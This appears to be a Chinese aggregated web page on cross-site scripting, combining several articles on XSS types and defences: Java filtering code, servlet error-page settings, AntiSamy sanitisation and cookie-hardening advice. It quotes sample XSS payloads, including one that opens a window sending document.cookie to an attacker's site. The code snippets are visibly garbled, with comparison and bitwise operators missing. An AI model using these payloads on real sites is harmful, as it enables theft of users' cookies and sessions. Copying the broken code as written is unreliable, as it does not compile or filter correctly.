攻击网站脚本下载_攻击网站脚本

hacker|
170

如何防止跨站点脚本攻击

防止跨站点脚本攻击的解决方法:

1.输入过滤

对每一个用户的输入或者请求首部,都要进行过滤。这需要程序员有良好的安全素养,而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题,如错误页等。

final String filterPattern="[{}\\[\\];\\]";

String inputStr = s.replaceAll(filterPattern," ");

2.输出过滤

public static String encode(String data)

{

final StringBuffer buf = new StringBuffer();

final char[] chars = data.toCharArray();

for (int i = 0; i chars.length; i++)

{

buf.append("" + (int) chars[i]);

}

return buf.toString();

}

public static String decodeHex(final String data,

final String charEncoding)

{

if (data == null)

{

return null;

}

byte[] inBytes = null;

try

{

inBytes = data.getBytes(charEncoding);

}

catch (UnsupportedEncodingException e)

{

//use default charset

inBytes = data.getBytes();

}

byte[] outBytes = new byte[inBytes.length];

int b1;

int b2;

int j=0;

for (int i = 0; i inBytes.length; i++)

{

if (inBytes[i] == '%')

{

b1 = Character.digit((char) inBytes[++i], 16);

b2 = Character.digit((char) inBytes[++i], 16);

outBytes[j++] = (byte) (((b1 0xf) 4) +

(b2 0xf));

}

else

{

outBytes[j++] = inBytes[i];

}

}

String encodedStr = null;

try

{

encodedStr = new String(outBytes, 0, j, charEncoding);

}

catch (UnsupportedEncodingException e)

{

encodedStr = new String(outBytes, 0, j);

}

return encodedStr;

}

!-- Maps the 404 Not Found response code

to the error page /errPage404 --

error-page

error-code404/error-code

location/errPage404/location

/error-page

!-- Maps any thrown ServletExceptions

to the error page /errPageServ --

error-page

exception-typejavax.servlet.ServletException/exception-type

location/errPageServ/location

/error-page

!-- Maps any other thrown exceptions

to a generic error page /errPageGeneric --

error-page

exception-typejava.lang.Throwable/exception-type

location/errPageGeneric/location

/error-page

任何的非servlet例外都被/errPageGeneric路径捕捉,这样就可以处理。

Throwable throwable = (Throwable)

request.getAttribute("javax.servlet.error.exception");

String status_code = ((Integer)

request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安装三方的应用防火墙,可以拦截css攻击。

附:

跨站脚本不像其他攻击只包含两个部分:攻击者和web站点。

跨站脚本包含三个部分:攻击者,客户和web站点。

跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。

攻击

一个get请求

GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0

Host:

会产生如下的结果

HTML

TitleWelcome!/Title

Hi Joe Hacker

BR

Welcome to our system

...

/HTML

但是如果请求被篡改

GET /welcome.cgi?name=scriptalert(document.cookie)/script HTTP/1.0

Host:

就会得到如下的响应

HTML

TitleWelcome!/Title

Hi scriptalert(document.cookie)/script

BR

Welcome to our system

...

/HTML

这样在客户端会有一段非法的脚本执行,这不具有破坏作用,但是如下的脚本就很危险了。

;scriptwindow.open(“”%2Bdocument.cookie)/script

响应如下:

HTML

TitleWelcome!/Title

Hi

scriptwindow.open(“”+document.cookie)/script

BR

Welcome to our system

...

/HTML

浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站,这样攻击者就得到了客户的cookie。

【web安全】xss跨站脚本攻击有哪些?

xss攻击可以分成两种类型:

1.非持久型攻击

2.持久型攻击

非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。

持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。

也可以分成三类:

反射型:经过后端,不经过数据库

存储型:经过后端,经过数据库

DOM:不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。

怎样过滤跨站恶意脚本攻击

1. 在输入流中截住form data中的恶意脚本

研究两种XSS攻击,如反射型和存储型XSS攻击,其恶意脚本都是来自用户的输入。因此,可以使用过滤用户输入的方法对恶意脚本进行过滤。对简单的HTTP请求,一般使用GET和POST方法。

2. 在输入流中检测滤掉来自其他网站的URL中的恶意脚本

当用户不小心点击了被其他黑客提供的假冒URL,则可能在该URL中注入恶意脚本。因此,也需要对这种情况进行处理。因此为确保其他在header中的恶意脚本,需要对request.getHeader进行重写。以下为例子:

public String getHeader(String name) {

String value = super.getHeader(name);

if (value == null)

return null;

return xssClean(value);

}

3. xssClean函数怎样实现才可以过滤掉恶意脚本呢?

如果是java语言,推荐使用antisamy。使用antisamy进行XSS清理非常简单,只需要简单的几个步骤即可达到目的。

1‘. 在pom.xml文件中加入antisamy的dependency,

dependency

groupIdorg.owasp.antisamy/groupId

artifactIdantisamy/artifactId

version1.5.3/version

/dependency

2’. 加入了dependency之后,就可以在xssClean中加入antisamy对恶意脚本进行清理。其中policy.xml是白名单,policy.xml中规定了各个html元素所必须满足的条件。antisamy的精髓之处在于,使用policy文件来规定你的过滤条件,若输入字符串不满足policy文件中的条件,则会过滤掉字符中的恶意脚本,返回过滤后的结果。具体代码如下:

private String xssClean(String value) {

AntiSamy antiSamy = new AntiSamy();

try {

final CleanResults cr = antiSamy.scan(value, Policy.getInstance("policy.xml"), AntiSamy.SAX);

return cr.getCleanHTML();

} catch (ScanException e) {

e.printStackTrace();

} catch (PolicyException e) {

e.printStackTrace();

}

return value;

}

这样,我们就将client端用户输入的request,在server端进行了拦截,并且进行了过滤。

跨站脚本攻击,如何利用工具和测试防范跨站点脚本攻击

跨站点脚本(XSS)允许攻击者通过利用因特网服务器的漏洞来发送恶意代码到其他用户。攻击者利用跨站点脚本(XSS)攻击向那些看似可信任的链接中注入恶意代码。当用户点击了链接后,内嵌的程序将被提交并且会在用户的电脑上执行,这会使黑客获取访问权限并偷走敏感数据。攻击者使用XSS来攻击受害者机器上的漏洞并且传输恶意代码而不是攻击系统本身。 通过用户输入的数据返回错误消息的Web表格,攻击者可以修改控制Web页面的HTML代码。黑客能够在垃圾信息中的链接里插入代码或者使用欺诈邮件来诱使用户对其身份产生信任。 例如攻击者可以发送带有URL的邮件给受害人,这个URL指向一个Web站点并且提供浏览器脚本作为输入;或者在博客或诸如Facebook、Twitter这样的社交网站上发布恶意URL链接。当用户点击这个链接时,该恶意站点以及脚本将会在其浏览器上运行。浏览器不知道脚本是恶意的并将盲目地运行这个程序,这转而允许攻击者的浏览器脚本使用站点的功能来窃取cookie或者冒充合法的用户来完成交易。 一些通常的跨站点脚本预防的最佳实践包括在部署前测试应用代码,并且以快速、简明的方式修补缺陷和漏洞。Web应用开发人员应该过滤用户的输入来移除可能的恶意字符和浏览器脚本,并且植入用户输入过滤代码来移除恶意字符。通常管理员也可以配置浏览器只接受来自信任站点的脚本或者关闭浏览器的脚本功能,尽管这样做可能导致使用Web站点的功能受限。 随着时代的进步黑客们变得更加先进,使用收集的工具集来加快漏洞攻击进程。这意味着仅仅部署这些通常的XSS预防实践是不够的,保护和预防过程必须从底层开始并持续提升。预防过程必须在开发阶段开始,建立在一个牢靠、安全的开发生命周期方法论之上的Web应用在发布版本中不太可能暴露出漏洞。这样以来,不仅提升了安全性,也改善了可用性而且缩减了维护的总体费用,因为在现场环境中修补问题比在开发阶段会花费更多。 威胁建模在XSS预防中也是重要的一个方面,应该纳入到每个组织的安全开发生命周期当中。威胁建模评估和辨识在开发阶段中应用程序面临的所有的风险,来帮助Web开发人员更好地理解需要什么样的保护以及攻击一旦得逞将对组织产生怎样的影响。要辨识一个特定应用的威胁级别,考虑它的资产以及它访问的敏感信息量是十分重要的。这个威胁建模过程将确保在应用的设计和开发过程中战略性地融合了安全因素源码天空 ,并且增强了Web开发人员的安全意识。 对于大型项目的Web开发人员来说,源代码扫描工具和Web应用漏洞扫描器是提高效率和减少工作量的通常选择。

跨站脚本攻击xss的原理是什么?有什么危害?如何防范

xxs攻击原理是网页对用户输入的字符串过滤不严,导致在提交输入信息的时候浏览器执行了黑客嵌入的xxs脚本,致使用户信息泄露。黑客可将伪装过的含义脚本语句的链接发送给受害者,当受害者点击链接的时候,由于网页没有过滤脚本语句,所以浏览器执行了脚本语句,而这个脚本语句的作用是将用户的cookie发送到黑客指定的地址,然后黑客就可以利用受害者的cookie窃取受害者的个人信息等等。这种攻击对服务器没有多大危害,但对用户危害很大,要防范这种攻击应该在设计网站的时候对用户提交的内容进行严格的过滤。

cookie的脚本攻击

尽管cookie没有病毒那么危险,但它仍包含了一些敏感信息:用户名,计算机名,使用的浏览器和曾经访问的网站。用户不希望这些内容泄漏出去,尤其是当其中还包含有私人信息的时候。

这并非危言耸听,一种名为跨站点脚本攻击(Cross site scripting)可以达到此目的。通常跨站点脚本攻击往往利用网站漏洞在网站页面中植入脚本代码或网站页面引用第三方法脚本代码,均存在跨站点脚本攻击的可能,在受到跨站点脚本攻击时,脚本指令将会读取当前站点的所有 Cookie 内容(已不存在 Cookie 作用域限制),然后通过某种方式将 Cookie 内容提交到指定的服务器(如:AJAX)。一旦 Cookie 落入攻击者手中,它将会重现其价值。

建议开发人员在向客户端 Cookie 输出敏感的内容时(譬如:该内容能识别用户身份):

1)设置该 Cookie 不能被脚本读取,这样在一定程度上解决上述问题。2)对 Cookie 内容进行加密,在加密前嵌入时间戳,保证每次加密后的密文都不一样(并且可以防止消息重放)。3)客户端请求时,每次或定时更新 Cookie 内容(即:基于第2小条,重新加密)4)每次向 Cookie 写入时间戳,数据库需要记录最后一次时间戳(防止 Cookie 篡改,或重放攻击)。5)客户端提交 Cookie 时,先解密然后校验时间戳,时间戳若小于数据数据库中记录,即意味发生攻击。

基于上述建议,即使 Cookie 被窃取,却因 Cookie 被随机更新,且内容无规律性,攻击者无法加以利用。另外利用了时间戳另一大好处就是防止 Cookie 篡改或重放。

Cookie 窃取:搜集用户cookie并发给攻击者的黑客。攻击者将利用cookie信息通过合法手段进入用户帐户。

Cookie 篡改:利用安全机制,攻击者加入代码从而改写 Cookie 内容,以便持续攻击。

0条大神的评论

发表评论